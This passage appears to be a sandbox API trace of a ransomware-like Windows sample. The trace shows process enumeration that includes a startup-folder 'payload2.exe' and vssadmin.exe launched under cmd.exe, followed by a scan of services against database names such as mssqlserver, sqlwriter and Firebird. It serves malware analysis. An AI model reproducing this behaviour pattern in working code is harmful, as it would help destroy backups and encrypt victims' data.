cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0037.948] lstrlenW (lpString="spoolsv.exe") returned 11 [0037.948] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0037.949] lstrlenW (lpString="taskhost.exe") returned 12 [0037.949] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.950] lstrlenW (lpString="svchost.exe") returned 11 [0037.950] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0037.950] lstrlenW (lpString="taskeng.exe") returned 11 [0037.950] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0037.951] lstrlenW (lpString="taskhost.exe") returned 12 [0037.951] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0037.952] lstrlenW (lpString="challenging.exe") returned 15 [0037.952] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0037.952] lstrlenW (lpString="pgp prix.exe") returned 12 [0037.953] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0037.953] lstrlenW (lpString="user-reno.exe") returned 13 [0037.953] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0037.954] lstrlenW (lpString="aggregate.exe") returned 13 [0037.954] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0037.955] lstrlenW (lpString="dressed.exe") returned 11 [0037.955] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0037.956] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0037.956] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0037.957] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0037.957] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0037.957] lstrlenW (lpString="developing.exe") returned 14 [0037.957] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0037.958] lstrlenW (lpString="supported.exe") returned 13 [0037.958] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0037.959] lstrlenW (lpString="girlstionselect.exe") returned 19 [0037.959] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0037.960] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0037.960] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0037.961] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0037.961] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0037.961] lstrlenW (lpString="eating.exe") returned 10 [0037.961] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0037.962] lstrlenW (lpString="nh_protected.exe") returned 16 [0037.962] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0038.608] lstrlenW (lpString="vulnerability.exe") returned 17 [0038.608] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0038.609] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0038.609] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0038.610] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0038.610] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0038.610] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0038.610] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0038.611] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0038.611] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0038.612] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0038.612] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.612] lstrlenW (lpString="dllhost.exe") returned 11 [0038.612] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.613] lstrlenW (lpString="dllhost.exe") returned 11 [0038.613] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0038.613] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0038.613] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0038.614] lstrlenW (lpString="cmd.exe") returned 7 [0038.614] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0038.615] lstrlenW (lpString="conhost.exe") returned 11 [0038.615] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0038.615] lstrlenW (lpString="vssadmin.exe") returned 12 [0038.615] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0038.616] CloseHandle (hObject=0x1a0) returned 1 [0038.616] Sleep (dwMilliseconds=0x1f4) [0039.672] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x67ffe0 [0039.673] EnumServicesStatusExW (in: hSCManager=0x67ffe0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0039.673] GetLastError () returned 0xea [0039.673] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x11e4) returned 0x3f740a8 [0039.673] EnumServicesStatusExW (in: hSCManager=0x67ffe0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f740a8, cbBufSize=0x11e4, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f740a8, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0039.673] CloseServiceHandle (hSCObject=0x67ffe0) returned 1 [0039.674] lstrlenW (lpString="Appinfo") returned 7 [0039.674] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0039.674] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0039.674] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0039.674] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0039.674] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0039.674] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0039.674] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.674] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.674] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0039.674] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0039.674] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0039.674] lstrlenW (lpString="AudioSrv") returned 8 [0039.674] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0039.674] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0039.674] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0039.674] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0039.674] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0039.674] lstrlenW (lpString="BFE") returned 3 [0039.674] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0039.674] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0039.674] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0039.674] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0039.674] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0039.674] lstrlenW (lpString="CryptSvc") returned 8 [0039.674] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0039.674] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0039.674] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0039.674] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0039.674] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0039.674] lstrlenW (lpString="CscService") returned 10 [0039.675] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0039.675] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0039.675] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0039.675] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0039.675] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0039.675] lstrlenW (lpString="DcomLaunch") returned 10 [0039.675] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.675] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.675] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0039.675] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0039.675] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0039.675] lstrlenW (lpString="Dhcp") returned 4 [0039.675] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0039.675] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0039.675] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0039.675] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0039.675] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0039.675] lstrlenW (lpString="Dnscache") returned 8 [0039.675] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0039.675] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0039.675] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0039.675] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0039.675] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0039.675] lstrlenW (lpString="DPS") returned 3 [0039.675] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0039.675] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0039.675] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0039.692] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0039.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0039.692] lstrlenW (lpString="eventlog") returned 8 [0039.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0039.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0039.692] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0039.692] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0039.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0039.692] lstrlenW (lpString="EventSystem") returned 11 [0039.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0039.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0039.692] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0039.692] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0039.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0039.692] lstrlenW (lpString="gpsvc") returned 5 [0039.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0039.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0039.692] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0039.692] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0039.692] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0039.692] lstrlenW (lpString="iphlpsvc") returned 8 [0039.692] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.692] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.692] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0039.693] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0039.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0039.693] lstrlenW (lpString="LanmanServer") returned 12 [0039.693] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0039.693] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0039.693] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0039.693] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0039.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0039.693] lstrlenW (lpString="LanmanWorkstation") returned 17 [0039.693] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.693] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.693] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0039.693] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0039.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0039.693] lstrlenW (lpString="lmhosts") returned 7 [0039.693] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0039.693] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0039.693] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0039.693] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0039.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0039.693] lstrlenW (lpString="MMCSS") returned 5 [0039.693] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0039.693] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0039.693] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0039.693] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0039.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0039.693] lstrlenW (lpString="MpsSvc") returned 6 [0039.693] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0039.693] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0039.693] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0039.693] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0039.693] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0039.693] lstrlenW (lpString="Netman") returned 6 [0039.694] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0039.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0039.694] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0039.694] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0039.694] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0039.694] lstrlenW (lpString="netprofm") returned 8 [0039.694] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0039.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0039.694] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0039.694] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0039.694] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0039.694] lstrlenW (lpString="NlaSvc") returned 6 [0039.694] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0039.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0039.694] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0039.694] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0039.694] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0039.694] lstrlenW (lpString="nsi") returned 3 [0039.694] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0039.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0039.694] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0039.694] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0039.694] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0039.694] lstrlenW (lpString="PcaSvc") returned 6 [0039.694] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0039.694] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0039.695] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0039.695] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0039.695] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0039.695] lstrlenW (lpString="PlugPlay") returned 8 [0039.695] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0039.695] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0039.695] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0039.695] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0039.695] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0039.695] lstrlenW (lpString="Power") returned 5 [0039.695] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0039.695] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0039.695] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0039.695] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0039.695] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0039.695] lstrlenW (lpString="ProfSvc") returned 7 [0039.695] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0039.695] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0039.695] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0039.695] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0039.695] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0039.695] lstrlenW (lpString="RpcEptMapper") returned 12 [0039.695] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.695] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.695] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0039.695] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0039.695] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0039.695] lstrlenW (lpString="RpcSs") returned 5 [0039.696] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0039.696] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 